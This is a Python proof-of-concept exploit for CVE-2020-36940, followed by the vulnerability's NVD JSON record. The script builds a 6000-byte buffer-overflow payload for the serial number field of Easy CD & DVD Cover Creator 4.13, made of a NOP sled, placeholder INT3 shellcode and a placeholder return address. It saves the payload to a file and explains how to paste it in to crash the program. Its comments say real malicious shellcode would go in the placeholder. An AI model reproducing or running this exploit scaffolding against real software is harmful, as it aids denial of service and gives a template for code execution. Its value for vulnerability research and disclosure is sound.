CVE-2020-36940

#!/usr/bin/env python3 """ CVE-2020-36940 PoC - Easy CD & DVD Cover Creator Buffer Overflow Easy CD & DVD Cover Creator 4.13 Serial Number Field Buffer Overflow This PoC demonstrates the buffer overflow vulnerability in the serial number input field of Easy CD & DVD Cover Creator 4.13 Reference: https://www.exploit-db.com/exploits/49337 """ import struct import sys def generate_payload(payload_size=6000): """ Generate buffer overflow payload for Easy CD & DVD Cover Creator Args: payload_size: Size of the payload in bytes (default: 6000) Returns: bytes: Malicious payload data """ # Fill pattern to trigger overflow # Using cyclic pattern to identify offset if needed payload = b'A' * payload_size # Alternative: Generate shellcode-friendly payload # NOP sled + shellcode + return address nop_sled = b'\x90' * 100 # 100 NOP instructions # Placeholder for actual shellcode # In real attack, this would contain malicious code shellcode = b'\xcc' * 50 # INT3 breakpoint (for testing only) # Fill remaining space with return address # Using address that points to NOP sled ret_addr = struct.pack('<I', 0x41414141) # Placeholder address filler = ret_addr * ((payload_size - len(nop_sled) - len(shellcode)) // 4) payload = nop_sled + shellcode + filler return payload def main(): print("[*] CVE-2020-36940 PoC Generator") print("[*] Target: Easy CD & DVD Cover Creator 4.13") print("[*] Vulnerability: Buffer Overflow in Serial Number Field\n") # Generate default payload (6000 bytes) payload = generate_payload(6000) print(f"[+] Generated payload size: {len(payload)} bytes") print(f"[+] Payload hex preview: {payload[:64].hex()}...") print("\n[!] Usage: Copy the generated payload and paste into") print(" the serial number field of Easy CD & DVD Cover Creator") print("\n[!] This will trigger a buffer overflow and crash the application.") # Save payload to file for easy access with open('CVE-2020-36940_payload.bin', 'wb') as f: f.write(payload) print(f"\n[+] Payload saved to: CVE-2020-36940_payload.bin") return 0 if __name__ == '__main__': sys.exit(main())

{"cve": {"id": "CVE-2020-36940", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:11.323", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Easy CD & DVD Cover Creator 4.13 contains a buffer overflow vulnerability in the serial number input field that allows attackers to crash the application. Attackers can generate a 6000-byte payload and paste it into the serial number field to trigger an application crash."}, {"lang": "es", "value": "Easy CD &amp; DVD Cover Creator 4.13 contiene una vulnerabilidad de desbordamiento de búfer en el campo de entrada del número de serie que permite a los atacantes bloquear la aplicación. Los atacantes pueden generar una carga útil de 6000 bytes y pegarla en el campo del número de serie para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49337", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/easy-cd-dvd-cover-creator-denial-of-service", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49337", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}